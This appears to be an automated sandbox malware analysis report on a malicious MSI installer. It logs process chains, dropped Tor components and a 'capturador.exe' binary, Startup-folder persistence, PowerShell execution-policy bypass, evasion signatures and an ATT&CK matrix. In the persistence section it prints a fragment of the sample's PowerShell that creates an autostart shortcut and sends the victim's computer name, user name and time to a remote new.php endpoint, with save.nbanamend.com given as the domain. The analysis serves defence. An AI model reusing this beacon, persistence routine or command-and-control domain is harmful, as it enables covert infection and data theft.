Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\YwZpT3p5Rh.msi"
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 4C63293B3FE9161A1CA264FB932A2300
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssFF45.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiFDAB.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrFDAC.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrFDAD.txt" -propSep " :<->: " -testPrefix "_testValue."
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\JQHPQS\ECSGNO.vbs"
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\JQHPQS\MRZANK.exe "C:\JQHPQS\MRZANK.exe" -f C:\JQHPQS\AZJVGE
Source: C:\JQHPQS\MRZANK.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy ByPass -File C:\JQHPQS\QIZABC.ps1 C:\JQHPQS\QRROJT.exe save.nbanamend.com
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\JQHPQS\ECSGNO.vbs"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Source: C:\Windows\System32\wscript.exeProcess created: C:\JQHPQS\MRZANK.exe "C:\JQHPQS\MRZANK.exe" -f C:\JQHPQS\AZJVGE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\JQHPQS\MRZANK.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy ByPass -File C:\JQHPQS\QIZABC.ps1 C:\JQHPQS\QRROJT.exe save.nbanamend.com
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20211123Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DFED7ED3B179C7609A.TMPJump to behavior
Source: classification engineClassification label: mal72.evad.winMSI@27/90@1/7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: YwZpT3p5Rh.msiStatic file information: TRID: Microsoft Windows Installer (77509/1) 52.18%
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7108:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4188:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5864:120:WilError_01
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: YwZpT3p5Rh.msiStatic file information: File size 6378496 > 1048576
Source: Binary string: .textn.pdb `4 source: powershell.exe, 00000017.00000002.546323293.0000000007540000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_07787710 push es; ret 23_2_07787720
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_077A2794 push E86CA943h; ret 23_2_077A2799
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_077AC017 push eax; mov dword ptr [esp], edx23_2_077ABFAC
Source: libcrypto-1_1.dll.1.dr Static PE information: section names: /4, /19, /31, /45, /57, /70, /81, /92
Source: libevent_core-2-1-7.dll.1.dr Static PE information: section names: /4, /19, /31, /45, /57, /70, /81, /92
Source: libevent_extra-2-1-7.dll.1.dr Static PE information: section names: /4, /19, /31, /45, /57, /70, /81, /92
Source: libevent-2-1-7.dll.1.dr Static PE information: section names: /4, /19, /31, /45, /57, /70, /81, /92
Source: libgcc_s_sjlj-1.dll.1.dr Static PE information: section names: /4, /19, /31, /45, /57, /70, /81, /92
Source: libssl-1_1.dll.1.dr Static PE information: section names: /4, /19, /31, /45, /57, /70, /81, /92
Source: libssp-0.dll.1.dr Static PE information: section names: /4, /19, /31, /45, /57, /70, /81, /92
Source: libwinpthread-1.dll.1.dr Static PE information: section names: /4, /19, /31, /45, /57, /70, /81, /92
Source: libcrypto-1_1.dll.5.dr Static PE information: section names: /4, /19, /31, /45, /57, /70, /81, /92
Source: libevent-2-1-7.dll.5.dr Static PE information: section names: /4, /19, /31, /45, /57, /70, /81, /92
Source: libevent_core-2-1-7.dll.5.dr Static PE information: section names: /4, /19, /31, /45, /57, /70, /81, /92
Source: libevent_extra-2-1-7.dll.5.dr Static PE information: section names: /4, /19, /31, /45, /57, /70, /81, /92
Source: libgcc_s_sjlj-1.dll.5.dr Static PE information: section names: /4, /19, /31, /45, /57, /70, /81, /92
Source: libssl-1_1.dll.5.dr Static PE information: section names: /4, /19, /31, /45, /57, /70, /81, /92
Source: libssp-0.dll.5.dr Static PE information: section names: /4, /19, /31, /45, /57, /70, /81, /92
Source: libwinpthread-1.dll.5.dr Static PE information: section names: /4, /19, /31, /45, /57, /70, /81, /92
Source: capturador.exe.1.drStatic PE information: 0xA2C71EB8 [Sun Jul 16 07:35:20 2056 UTC]
Source: C:\Windows\System32\msiexec.exe File created: C:\ProgramData\Leitor\libgcc_s_sjlj-1.dll
Source: C:\Windows\System32\msiexec.exe File created: C:\ProgramData\Leitor\libwinpthread-1.dll
Source: C:\Windows\System32\msiexec.exe File created: C:\ProgramData\Leitor\tor.exe
Source: C:\Windows\System32\msiexec.exe File created: C:\ProgramData\Leitor\capturador.exe
Source: C:\Windows\System32\msiexec.exe File created: C:\ProgramData\Leitor\libcrypto-1_1.dll
Source: C:\Windows\System32\msiexec.exe File created: C:\ProgramData\Leitor\libevent_core-2-1-7.dll
Source: C:\Windows\System32\msiexec.exe File created: C:\ProgramData\Leitor\libevent-2-1-7.dll
Source: C:\Windows\System32\msiexec.exe File created: C:\ProgramData\Leitor\libevent_extra-2-1-7.dll
Source: C:\Windows\System32\msiexec.exe File created: C:\ProgramData\Leitor\libssl-1_1.dll
Source: C:\Windows\System32\msiexec.exe File created: C:\ProgramData\Leitor\libssp-0.dll
Source: C:\Windows\System32\msiexec.exe File created: C:\ProgramData\Leitor\tor-gencert.exe
Source: C:\Windows\System32\msiexec.exe File created: C:\ProgramData\Leitor\zlib1.dll
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIDE8B.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIE275.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIFCD8.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIE17A.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIE39F.tmp

Boot Survival:

Powershell creates an autostart link
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk"$WshShell = New-Object -ComObject WScript.Shell$Shortcut = $WshShell.CreateShortcut($lnkFilename)$Shortcut.TargetPath = $vbsPath$Shortcut.WorkingDirectory = $newPath$Shortcut.WindowStyle = 7$Shortcut.Save()#Start-Process -FilePath $lnkFileName#$hasCore = "No"Get-Process | Where-Object { if ($_.ProcessName -eq "core") { $hasCore = "Yes"} }$dataEnc = [System.Web.HttpUtility]::UrlEncode("$($env:COMPUTERNAME)|$($env:USERNAME)|$hasCore|$(Get-Date -Format `"dd/MM/yyyy HH:mm`")")$response = Invoke-WebRequest -UseBasicParsing -Uri "https://$domain/new.php?data=$dataEnc"#Remove-Item -Path "$currentPath\*" $_.PSParentPath.Replace("Microsoft.PowerShell.Core\FileSystem::", "") [String]::Format("{0,10} {1,8}", $_.LastWriteTime.ToString("d"), $_.LastWriteTime.ToString("t")) if ($_ -is [System.IO.DirectoryInfo]) { return '' }if ($_.Attributes -band [System.IO.FileAttributes]::Offline){ return '({0})' -f $_.Length}return $_.Length{ if ($_.ProcessName -eq "core") { $hasCore = "Yes"} }$global:
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\upspur.lnk

Hooking and other Techniques for Hiding and Protection:

May use the Tor software to hide its network traffic
Source: MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmpBinary or memory string: onion-port
Source: C:\Windows\System32\msiexec.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3228 Thread sleep count: 3688 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1336 Thread sleep count: 4068 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1884 Thread sleep count: 53 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6380 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6316 Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4308 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6316 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5412 Thread sleep count: 4572 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5464 Thread sleep count: 3156 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000 Thread sleep time: -900000s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSIE275.tmp
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\ProgramData\Leitor\capturador.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\JQHPQS\libevent_extra-2-1-7.dll
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSIE17A.tmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\JQHPQS\capturador.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\JQHPQS\libevent_core-2-1-7.dll
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\ProgramData\Leitor\libevent_core-2-1-7.dll
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSIE39F.tmp
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\ProgramData\Leitor\libevent_extra-2-1-7.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\JQHPQS\QRROJT.exe (copy)
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\ProgramData\Leitor\tor-gencert.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\JQHPQS\tor-gencert.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 900000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3688
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4068
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7251
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2041
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4572
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3156
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\msiexec.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: powershell.exe, 00000017.00000003.488201386.00000000052DA000.00000004.00000001.sdmp Binary or memory string: Hyper-V
Source: MRZANK.exe, 00000012.00000002.539363033.000000000110A000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllo
Source: powershell.exe, 00000017.00000003.488201386.00000000052DA000.00000004.00000001.sdmp Binary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Bypasses PowerShell execution policy
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssFF45.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiFDAB.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrFDAC.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrFDAD.txt" -propSep " :<->: " -testPrefix "_testValue."
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\JQHPQS\ECSGNO.vbs"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\JQHPQS\MRZANK.exe "C:\JQHPQS\MRZANK.exe" -f C:\JQHPQS\AZJVGE
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy ByPass -File C:\JQHPQS\QIZABC.ps1 C:\JQHPQS\QRROJT.exe save.nbanamend.com
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Source: C:\Windows\System32\wscript.exe Process created: C:\JQHPQS\MRZANK.exe "C:\JQHPQS\MRZANK.exe" -f C:\JQHPQS\AZJVGE
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy ByPass -File C:\JQHPQS\QIZABC.ps1 C:\JQHPQS\QRROJT.exe save.nbanamend.com
Source: MRZANK.exe, 00000012.00000002.539690483.0000000001ED0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: MRZANK.exe, 00000012.00000002.539690483.0000000001ED0000.00000002.00020000.sdmp Binary or memory string: Progman
Source: MRZANK.exe, 00000012.00000002.539690483.0000000001ED0000.00000002.00020000.sdmp Binary or memory string: SProgram Managerl
Source: MRZANK.exe, 00000012.00000002.539690483.0000000001ED0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd,
Source: MRZANK.exe, 00000012.00000002.539690483.0000000001ED0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation
Source: C:\JQHPQS\MRZANK.exe; Queries volume information: C:\JQHPQS\AZJVGE VolumeInformation
Source: C:\JQHPQS\MRZANK.exe; Queries volume information: C:\ProgramData\hscore\hs_ed25519_secret_key VolumeInformation
Source: C:\JQHPQS\MRZANK.exe; Queries volume information: C:\ProgramData\hscore\hs_ed25519_public_key VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 23_2_077AF01C CreateNamedPipeW,23_2_077AF01C

Mitre Att&ck Matrix

| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Replication Through Removable Media 1 | Scripting 111 | Startup Items 1 | Startup Items 1 | Scripting 111 | Input Capture 1 | Peripheral Device Discovery 11 | Replication Through Removable Media 1 | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
| Default Accounts | Command and Scripting Interpreter 1 | DLL Side-Loading 1 | DLL Side-Loading 1 | Obfuscated Files or Information 1 | LSASS Memory | File and Directory Discovery 2 | Remote Desktop Protocol | Input Capture 1 | Exfiltration Over Bluetooth | Encrypted Channel 11 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | PowerShell 4 | Registry Run Keys / Startup Folder 12 | Process Injection 13 | Timestomp 1 | Security Account Manager | System Information Discovery 13 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Standard Port 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | At (Windows) | Logon Script (Mac) | Registry Run Keys / Startup Folder 12 | DLL Side-Loading 1 | NTDS | Query Registry 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Multi-hop Proxy 1 | SIM Card Swap | | Carrier Billing Fraud |
| Cloud Accounts | Cron | Network Logon Script | Network Logon Script | File Deletion 1 | LSA Secrets | Security Software Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Non-Application Layer Protocol 2 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
| Replication Through Removable Media | Launchd | Rc.common | Rc.common | Masquerading 21 | Cached Domain Credentials | Process Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Application Layer Protocol 13 | Jamming or Denial of Service | | Abuse Accessibility Features |
| External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion 21 | DCSync | Virtualization/Sandbox Evasion 21 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Proxy 2 | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
| Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection 13 | Proc Filesystem | Application Window Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |
| Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | Remote System Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction |

Behavior Graph

Behavior Graph ID: 527489, Sample: YwZpT3p5Rh.msi, Startdate: 23/11/2021, Architecture: WINDOWS, Score: 72

Sample signatures: Found Tor onion address; May use the Tor software to hide its network traffic; Sigma detected: Change PowerShell Policies to a Unsecure Level; Sigma detected: Suspicious Script Execution From Temp Folder

